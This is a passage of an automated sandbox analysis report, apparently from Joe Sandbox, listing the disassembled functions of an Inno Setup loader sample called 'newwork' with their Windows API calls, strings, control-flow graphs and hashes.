                                                                                • Associated: 00000000.00000002.2567386416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2567835108.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2567893233.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$HandleModulePolicyProcess
                                                                                • String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
                                                                                • API String ID: 3256987805-3653653586
                                                                                • Opcode ID: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
                                                                                • Instruction ID: 1f393095ee8ecda9e1e01b6ca7d440447e938bbc9796bcd5dbe8d266940e5f64
                                                                                • Opcode Fuzzy Hash: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
                                                                                • Instruction Fuzzy Hash: 5FE02DD03813013AEA5032F20D83B2B20884AD0B49B2414377F25B61C3EDBDDA40587E

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • SetLastError.KERNEL32 ref: 0040AAC1
                                                                                  • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B244,?,020D246C), ref: 0040966C
                                                                                • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040AAFE
                                                                                • SetWindowLongA.USER32(0002047E,000000FC,00409960), ref: 0040AB15
                                                                                • RemoveDirectoryA.KERNEL32(00000000,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC01
                                                                                • DestroyWindow.USER32(0002047E,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC15
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2567426632.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2567386416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2567835108.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2567893233.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Window$ErrorLast$CreateDestroyDirectoryLongRemove
                                                                                • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                                                • API String ID: 3757039580-3001827809
                                                                                • Opcode ID: 7bc9c0c8e9dfd2478b94306391eafe1fb51b7566d8199cdbb2b2653dcbc3d95c
                                                                                • Instruction ID: 81987b3bab642c92fe87a7372e0454594c4b8fe140ce311e0f93b1eeebf6ab37
                                                                                • Opcode Fuzzy Hash: 7bc9c0c8e9dfd2478b94306391eafe1fb51b7566d8199cdbb2b2653dcbc3d95c
                                                                                • Instruction Fuzzy Hash: 25412E70604204DBDB10EBA9EE89B9E37A5EB44304F10467FF510B72E2D7B89855CB9D

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,0040A62C), ref: 004090C4
                                                                                • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090CA
                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,0040A62C), ref: 004090DE
                                                                                • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090E4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2567426632.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2567386416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2567835108.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2567893233.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: AddressHandleModuleProc
                                                                                • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                                • API String ID: 1646373207-2130885113
                                                                                • Opcode ID: 0414f1d66f28dc470df4633e5994336701384173b3f6f66b470f3ad827f759f7
                                                                                • Instruction ID: 214dda5481ef482ebe311b1329301f35405b1013d97e3062c17ffb2c8286d57d
                                                                                • Opcode Fuzzy Hash: 0414f1d66f28dc470df4633e5994336701384173b3f6f66b470f3ad827f759f7
                                                                                • Instruction Fuzzy Hash: 21017C70748342AEFB00BB76DD4AB163A68E785704F60457BF640BA2D3DABD4C04D66E

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040AAFE
                                                                                • SetWindowLongA.USER32(0002047E,000000FC,00409960), ref: 0040AB15
                                                                                  • Part of subcall function 00406B7C: GetCommandLineA.KERNEL32(00000000,00406BC0,?,?,?,?,00000000,?,0040AB86,?), ref: 00406B94
                                                                                  • Part of subcall function 004099EC: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,020D246C,00409AD8,00000000,00409ABF), ref: 00409A5C
                                                                                  • Part of subcall function 004099EC: CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,020D246C,00409AD8,00000000), ref: 00409A70
                                                                                  • Part of subcall function 004099EC: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A89
                                                                                  • Part of subcall function 004099EC: GetExitCodeProcess.KERNEL32(?,0040B244), ref: 00409A9B
                                                                                  • Part of subcall function 004099EC: CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,020D246C,00409AD8), ref: 00409AA4
                                                                                • RemoveDirectoryA.KERNEL32(00000000,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC01
                                                                                • DestroyWindow.USER32(0002047E,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC15
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2567426632.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2567386416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2567835108.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2567893233.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Window$CloseCreateHandleProcess$CodeCommandDestroyDirectoryExitLineLongMultipleObjectsRemoveWait
                                                                                • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                                                • API String ID: 3586484885-3001827809
                                                                                • Opcode ID: c367800830601d7b7bb1e4b9cc729c69669d466ec6c890b8506752b9ad64910a
                                                                                • Instruction ID: d3376fcde1141b4290a3dca450fc2844fa47922897975e075ebf06e3b6db64eb
                                                                                • Opcode Fuzzy Hash: c367800830601d7b7bb1e4b9cc729c69669d466ec6c890b8506752b9ad64910a
                                                                                • Instruction Fuzzy Hash: 77411A71604204DFD714EBA9EE85B5A37B5EB48304F20427BF500BB2E1D7B8A855CB9D

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,020D246C,00409AD8,00000000,00409ABF), ref: 00409A5C
                                                                                • CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,020D246C,00409AD8,00000000), ref: 00409A70
                                                                                • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A89
                                                                                • GetExitCodeProcess.KERNEL32(?,0040B244), ref: 00409A9B
                                                                                • CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,020D246C,00409AD8), ref: 00409AA4
                                                                                  • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B244,?,020D246C), ref: 0040966C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2567426632.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2567386416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2567835108.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2567893233.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CloseHandleProcess$CodeCreateErrorExitLastMultipleObjectsWait
                                                                                • String ID: D
                                                                                • API String ID: 3356880605-2746444292
                                                                                • Opcode ID: aadf6f075de5bdb3c28d757ddccd10dd30f6bbfdbbad62eb54c24073370c977f
                                                                                • Instruction ID: b58d0f6e2b8975977e6c7b71aada5392bea55c03070ce9fad3dcef5aa6d4018a
                                                                                • Opcode Fuzzy Hash: aadf6f075de5bdb3c28d757ddccd10dd30f6bbfdbbad62eb54c24073370c977f
                                                                                • Instruction Fuzzy Hash: EE1142B16402486EDB00EBE6CC42F9EB7ACEF49714F50013BB604F72C6DA785D048A69

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 136 401918-40193a RtlInitializeCriticalSection 137 401946-40197c call 4012dc * 3 LocalAlloc 136->137 138 40193c-401941 RtlEnterCriticalSection 136->138 145 4019ad-4019c1 137->145 146 40197e 137->146 138->137 149 4019c3-4019c8 RtlLeaveCriticalSection 145->149 150 4019cd 145->150 148 401983-401995 146->148 148->148 151 401997-4019a6 148->151 149->150 151->145
                                                                                APIs
                                                                                • RtlInitializeCriticalSection.KERNEL32(0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040192E
                                                                                • RtlEnterCriticalSection.KERNEL32(0040C41C,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 00401941
                                                                                • LocalAlloc.KERNEL32(00000000,00000FF8,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040196B
                                                                                • RtlLeaveCriticalSection.KERNEL32(0040C41C,004019D5,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 004019C8
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2567426632.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2567386416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2567835108.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2567893233.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                • String ID:
                                                                                • API String ID: 730355536-0
                                                                                • Opcode ID: 38709c719971e1168baf9cdc3c67f999ad3db3ab521e9349fb3b390a12b3c6f3
                                                                                • Instruction ID: 093a8b970c40f4dda7bd37408b901a2e20e4e29fb74a5496b56404d4d89a3717
                                                                                • Opcode Fuzzy Hash: 38709c719971e1168baf9cdc3c67f999ad3db3ab521e9349fb3b390a12b3c6f3
                                                                                • Instruction Fuzzy Hash: CC0161B0684240DEE715ABA999E6B353AA4E786744F10427FF080F62F2C67C4450CB9D

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 0040A878
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2567426632.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2567386416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2567835108.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2567893233.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Message
                                                                                • String ID: .tmp$y@
                                                                                • API String ID: 2030045667-2396523267
                                                                                • Opcode ID: 55a53fbd7ad7285035f8ab2cde1915fb146aa3dc543cd9b52406218d685c1c98
                                                                                • Instruction ID: 5e9257013af3d55ef2b6e359c41f87f67318ae2a4e6dbf07461b5d8c6de74657
                                                                                • Opcode Fuzzy Hash: 55a53fbd7ad7285035f8ab2cde1915fb146aa3dc543cd9b52406218d685c1c98
                                                                                • Instruction Fuzzy Hash: 3B41C030704200CFD311EF25DED1A1A77A5EB49304B214A3AF804B73E1CAB9AC11CBAD

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 0040A878
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2567426632.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2567386416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2567835108.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2567893233.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Message
                                                                                • String ID: .tmp$y@
                                                                                • API String ID: 2030045667-2396523267
                                                                                • Opcode ID: 4e131503fe38447772e4e2294cf5373b7e2007f9fac8d76d0a71823c743fc64d
                                                                                • Instruction ID: 95bba075cf9db07042691c1556ef0613dbe482a65a3614fff4d0ead14828e6f7
                                                                                • Opcode Fuzzy Hash: 4e131503fe38447772e4e2294cf5373b7e2007f9fac8d76d0a71823c743fc64d
                                                                                • Instruction Fuzzy Hash: E341BE30700200DFC711EF65DED2A1A77A5EB49304B104A3AF804B73E2CAB9AC01CBAD

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409376
                                                                                • GetLastError.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040937F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2567426632.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2567386416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2567835108.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2567893233.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CreateDirectoryErrorLast
                                                                                • String ID: .tmp
                                                                                • API String ID: 1375471231-2986845003
                                                                                • Opcode ID: 1c7982c9535877cc809d76a2290e1ec991a7408e90ad789d49a53b04ffd62ed2
                                                                                • Instruction ID: b240cf9bc22f775501a2d99da134be40bb2f76fb21a7d6e050461713caae6e8b
                                                                                • Opcode Fuzzy Hash: 1c7982c9535877cc809d76a2290e1ec991a7408e90ad789d49a53b04ffd62ed2
                                                                                • Instruction Fuzzy Hash: 9E216774A00208ABDB05EFA1C8429DFB7B8EF88304F50457BE901B73C2DA3C9E058A65

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 342 407749-40774a 343 4076dc-4076e6 WriteFile 342->343 344 40774c-40776f 342->344 345 4076e8-4076ea call 40748c 343->345 346 4076ef-4076f2 343->346 347 407770-407785 344->347 345->346 351 407700-407704 346->351 352 4076f4-4076fb call 4073ec 346->352 348 407787 347->348 349 4077f9 347->349 353 40778a-40778f 348->353 354 4077fd-407802 348->354 355 40783b-40783d 349->355 356 4077fb 349->356 352->351 359 407803-407819 353->359 362 407791-407792 353->362 354->359 360 407841-407843 355->360 356->354 361 40785b-40785c 359->361 370 40781b 359->370 360->361 363 4078d6-4078eb call 407890 InterlockedExchange 361->363 364 40785e-40788c 361->364 365 407724-407741 362->365 366 407794-4077b4 362->366 387 407912-407917 363->387 388 4078ed-407910 363->388 380 407820-407823 364->380 381 407890-407893 364->381 369 4077b5 365->369 372 407743 365->372 366->369 374 4077b6-4077b7 369->374 375 4077f7-4077f8 369->375 376 40781e-40781f 370->376 378 407746-407747 372->378 379 4077b9 372->379 374->379 375->349 376->380 378->342 382 4077bb-4077cd 378->382 379->382 384 407824 380->384 385 407898 380->385 381->385 382->360 386 4077cf-4077d4 382->386 389 407825 384->389 390 40789a 384->390 385->390 386->355 394 4077d6-4077de 386->394 388->387 388->388 392 407896-407897 389->392 393 407826-40782d 389->393 395 40789f 390->395 392->385 396 4078a1 393->396 397 40782f 393->397 394->347 405 4077e0 394->405 395->396 402 4078a3 396->402 403 4078ac 396->403 399 407832-407833 397->399 400 4078a5-4078aa 397->400 399->355 399->376 404 4078ae-4078af 400->404 402->400 403->404 404->395 406 4078b1-4078bd 404->406 405->375 406->385 407 4078bf-4078c0 406->407
                                                                                APIs
                                                                                • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2567426632.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2567386416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2567835108.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2567893233.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: FileWrite
                                                                                • String ID:
                                                                                • API String ID: 3934441357-0
                                                                                • Opcode ID: 43d3196ec1ce5242573e8f450cfa6a0a1bc6604aabb0088ea34051851cbbaa4a
                                                                                • Instruction ID: 20d0a63744b7af467993d3e8aec565234b7be2d060ba20bf9fd199bb98bd5a4e
                                                                                • Opcode Fuzzy Hash: 43d3196ec1ce5242573e8f450cfa6a0a1bc6604aabb0088ea34051851cbbaa4a
                                                                                • Instruction Fuzzy Hash: 8251D12294D2910FC7126B7849685A53FE0FE5331132E92FBC5C1AB1A3D27CA847D35B

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 408 401fd4-401fe6 409 401fe8 call 401918 408->409 410 401ffb-402010 408->410 414 401fed-401fef 409->414 412 402012-402017 RtlEnterCriticalSection 410->412 413 40201c-402025 410->413 412->413 415 402027 413->415 416 40202c-402032 413->416 414->410 417 401ff1-401ff6 414->417 415->416 418 402038-40203c 416->418 419 4020cb-4020d1 416->419 420 40214f-402158 417->420 423 402041-402050 418->423 424 40203e 418->424 421 4020d3-4020e0 419->421 422 40211d-40211f call 401ee0 419->422 425 4020e2-4020ea 421->425 426 4020ef-40211b call 402f54 421->426 429 402124-40213b 422->429 423->419 427 402052-402060 423->427 424->423 425->426 426->420 431 402062-402066 427->431 432 40207c-402080 427->432 440 402147 429->440 441 40213d-402142 RtlLeaveCriticalSection 429->441 433 402068 431->433 434 40206b-40207a 431->434 436 402082 432->436 437 402085-4020a0 432->437 433->434 439 4020a2-4020c6 call 402f54 434->439 436->437 437->439 439->420 441->440
                                                                                APIs
                                                                                • RtlEnterCriticalSection.KERNEL32(0040C41C,00000000,00402148), ref: 00402017
                                                                                  • Part of subcall function 00401918: RtlInitializeCriticalSection.KERNEL32(0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040192E
                                                                                  • Part of subcall function 00401918: RtlEnterCriticalSection.KERNEL32(0040C41C,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 00401941
                                                                                  • Part of subcall function 00401918: LocalAlloc.KERNEL32(00000000,00000FF8,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040196B
                                                                                  • Part of subcall function 00401918: RtlLeaveCriticalSection.KERNEL32(0040C41C,004019D5,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 004019C8
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2567426632.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2567386416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2567835108.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2567893233.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection$Enter$AllocInitializeLeaveLocal
                                                                                • String ID:
                                                                                • API String ID: 296031713-0
                                                                                • Opcode ID: e41243de7c80276a36dcdd2c2c0e451bb1a6f3055e5ddec7aea90b49354f7273
                                                                                • Instruction ID: b272be6629c35a549fc4f1c5a19e6e0df2414f51bb24a7fd7fb800939d1160d0
                                                                                • Opcode Fuzzy Hash: e41243de7c80276a36dcdd2c2c0e451bb1a6f3055e5ddec7aea90b49354f7273
                                                                                • Instruction Fuzzy Hash: D4419CB2A40711DFDB108F69DEC562A77A0FB58314B25837AD984B73E1D378A842CB48

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 444 406fa0-406ff3 SetErrorMode call 403414 LoadLibraryA
                                                                                APIs
                                                                                • SetErrorMode.KERNEL32(00008000), ref: 00406FAA
                                                                                • LoadLibraryA.KERNEL32(00000000,00000000,00406FF4,?,00000000,00407012,?,00008000), ref: 00406FD9
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2567426632.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2567386416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2567835108.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2567893233.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLibraryLoadMode
                                                                                • String ID:
                                                                                • API String ID: 2987862817-0
                                                                                • Opcode ID: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
                                                                                • Instruction ID: 292e1fc4e19851716b0ab93d2d43454b233f1d25ff8a05a0d03104374ea2dcbc
                                                                                • Opcode Fuzzy Hash: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
                                                                                • Instruction Fuzzy Hash: D6F08270A14704BEDB129FB68C5282ABBECEB4DB0475349BAF914A26D2E53C5C209568
                                                                                APIs
                                                                                • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 0040768B
                                                                                • GetLastError.KERNEL32(?,?,?,00000000), ref: 00407693
                                                                                  • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020D03AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2567426632.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2567386416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2567835108.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2567893233.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast$FilePointer
                                                                                • String ID:
                                                                                • API String ID: 1156039329-0
                                                                                • Opcode ID: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
                                                                                • Instruction ID: 64daf3b7b2b4cd691f255a674f922558070816022eb0a012369b73df1192a31e
                                                                                • Opcode Fuzzy Hash: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
                                                                                • Instruction Fuzzy Hash: B2E092766081016FD600D55EC881B9B37DCDFC5364F104536B654EB2D1D679EC108776

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 448 40762c-40764a ReadFile 449 407663-40766a 448->449 450 40764c-407650 448->450 451 407652-40765a GetLastError 450->451 452 40765c-40765e call 40748c 450->452 451->449 451->452 452->449
                                                                                APIs
                                                                                • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00407643
                                                                                • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00407652
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2567426632.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2567386416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2567835108.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2567893233.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorFileLastRead
                                                                                • String ID:
                                                                                • API String ID: 1948546556-0
                                                                                • Opcode ID: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
                                                                                • Instruction ID: e2f452503b48da12a69c10a9d1416f2aa512a4714c212e67fea7d8588799396e
                                                                                • Opcode Fuzzy Hash: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
                                                                                • Instruction Fuzzy Hash: 69E012A1A081106ADB24A66E9CC5F6B6BDCCBC5724F14457BF504DB382D678DC0487BB
                                                                                APIs
                                                                                • SetFilePointer.KERNEL32(?,00000000,?,00000001), ref: 004075DB
                                                                                • GetLastError.KERNEL32(?,00000000,?,00000001), ref: 004075E7
                                                                                  • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020D03AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2567426632.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2567386416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2567835108.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2567893233.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast$FilePointer
                                                                                • String ID:
                                                                                • API String ID: 1156039329-0
                                                                                • Opcode ID: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
                                                                                • Instruction ID: 74cf86129294d2faf5969c20f66175129728110ffa3c668ef2bae8a95e28f18b
